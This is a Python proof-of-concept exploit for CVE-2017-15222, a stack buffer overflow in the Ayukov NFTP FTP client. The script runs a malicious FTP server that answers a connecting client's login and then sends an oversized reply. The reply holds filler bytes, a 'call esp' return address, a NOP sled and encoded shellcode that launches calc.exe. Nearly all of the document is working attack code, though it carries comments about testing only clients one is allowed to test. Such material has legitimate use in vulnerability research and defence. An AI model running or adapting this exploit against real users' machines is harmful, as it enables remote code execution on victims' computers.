Ayukov NFTP FTP Client Buffer Overflow
Posted on 25 October 2017
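#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
####################################
# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow
# Date: 2017-10-21
# Exploit Author: Berk Cem GAPksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://ayukov.com/nftp/source-release.html
# Software Link: ftp://ftp.ayukov.com/pub/nftp/
# Version: v1.71, v1.72, v1.8, v2.0
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2017-15222
#
# How it works: this script plays a minimal *malicious FTP server*.  It
# answers the client's greeting/USER/PASS with 220/331/230 and then replies
# to the next command with an oversized line that overflows a stack buffer
# in the vulnerable nftpc.exe client.  The victim is whoever connects, so
# only point a client you are allowed to test at it.  The payload below
# launches calc.exe on the client machine.
#
# The listener binds to loopback only (IP = '127.0.0.1'); change IP
# deliberately if the client runs on another host.
import socket
import sys

IP = '127.0.0.1'
PORT = 21

# (exec calc.exe) -- encoded payload taken verbatim from the original PoC.
SHELLCODE = (
    b"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
    b"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5"
    b"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b"
    b"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd"
    b"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb"
    b"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08"
    b"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64"
    b"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33"
    b"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5"
    b"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b"
    b"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98"
    b"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43"
    b"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53"
    b"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f"
    b"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea"
    b"\x51\x58"
)

# call esp - nftpc.exe  #0040FCDD  (little-endian on the wire).
# The author's note: "Can call esp but the null byte terminates the string."
# The high byte 0x00 of this address is the LAST byte written, so a
# C-string style copy in the client stops right after the saved return
# address is overwritten.  NOTE(review): whether the NOP sled and shellcode
# that follow the null ever reach the stack therefore depends on how nftpc
# copies the reply -- confirm when reproducing.
CALL_ESP = b"\xdd\xfc\x40\x00"

OFFSET = 4116       # filler bytes before the saved return address
NOP_SLED = 16       # 0x90 bytes between the return address and the shellcode
TOTAL_LEN = 15000   # overall length of the malicious reply line (as in the PoC)


def build_payload(shellcode=SHELLCODE, ret_addr=CALL_ESP, offset=OFFSET,
                  nop_sled=NOP_SLED, total_len=TOTAL_LEN):
    """Assemble the overflow string: filler, return address, NOP sled, shellcode, tail.

    Layout (all sizes in bytes)::

        'A' * offset | ret_addr | '\\x90' * nop_sled | shellcode | 'C' * tail

    where ``tail`` pads the result to exactly ``total_len`` bytes, matching
    the original PoC's ``"C" * (15000-4116-4-16-len(shellcode))``.

    Args:
        shellcode: bytes to place after the NOP sled.
        ret_addr: 4-byte little-endian address written over the saved EIP.
        offset: number of filler bytes before ``ret_addr``.
        nop_sled: number of 0x90 bytes after ``ret_addr``.
        total_len: total length of the returned payload.

    Returns:
        A ``bytes`` object of length ``total_len``.

    Raises:
        ValueError: if ``ret_addr`` is not exactly 4 bytes, or if the pieces
            do not fit in ``total_len`` (the original silently produced a
            short payload here because ``"C" * negative`` is empty).
    """
    if len(ret_addr) != 4:
        raise ValueError("ret_addr must be exactly 4 bytes (32-bit target)")
    tail = total_len - offset - len(ret_addr) - nop_sled - len(shellcode)
    if tail < 0:
        raise ValueError(
            "payload does not fit: need %d bytes, total_len is %d"
            % (total_len - tail, total_len)
        )
    return (
        b"A" * offset
        + ret_addr
        + b"\x90" * nop_sled
        + shellcode
        + b"C" * tail
    )


def _handle_client(conn, payload):
    """Run the fake FTP dialogue with one connected client and send ``payload``.

    Replies are CRLF-terminated as FTP requires (RFC 959).  The client's
    commands are only echoed to stdout, never parsed: the script answers
    220 / 331 / 230 regardless of what was sent, then answers the next
    command with the overflow line.

    Args:
        conn: connected socket (closed by the caller).
        payload: the bytes from :func:`build_payload`.
    """
    conn.send(b'220 Welcome!\r\n')
    print(conn.recv(1024))            # normally USER
    conn.send(b'331 OK.\r\n')
    print(conn.recv(1024))            # normally PASS
    conn.send(b'230 OK.\r\n')
    print(conn.recv(1024))            # first post-login command
    conn.send(payload + b'\r\n')      # the overflowing reply
    print(conn.recv(1024))
    conn.send(b'257' + b'\r\n')


def serve(ip=IP, port=PORT, payload=None):
    """Listen on ``(ip, port)`` and feed ``payload`` to every client that connects.

    Args:
        ip: address to bind; defaults to loopback.
        port: TCP port to bind; defaults to 21 (may need privileges).
        payload: bytes to send as the malicious reply; built with the
            module defaults when ``None``.

    Raises:
        SystemExit: if the listening socket cannot be bound.  The original
            script only printed a message and then called ``accept()`` on
            the unusable socket.
    """
    if payload is None:
        payload = build_payload()
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        srv.bind((ip, port))
        srv.listen(20)
    except socket.error as exc:
        print("[!] Failed to bind the server to port: " + str(port) + " (" + str(exc) + ")")
        srv.close()
        sys.exit(1)
    print("[i] FTP Server started on port: " + str(port))
    try:
        while True:
            conn, addr = srv.accept()
            print("[i] Connection from " + str(addr))
            try:
                _handle_client(conn, payload)
            except socket.error as exc:
                # A client that dies mid-dialogue (e.g. the crash we caused)
                # must not take the listener down with it.
                print("[!] Client error: " + str(exc))
            finally:
                conn.close()
    finally:
        srv.close()


if __name__ == "__main__":
    serve()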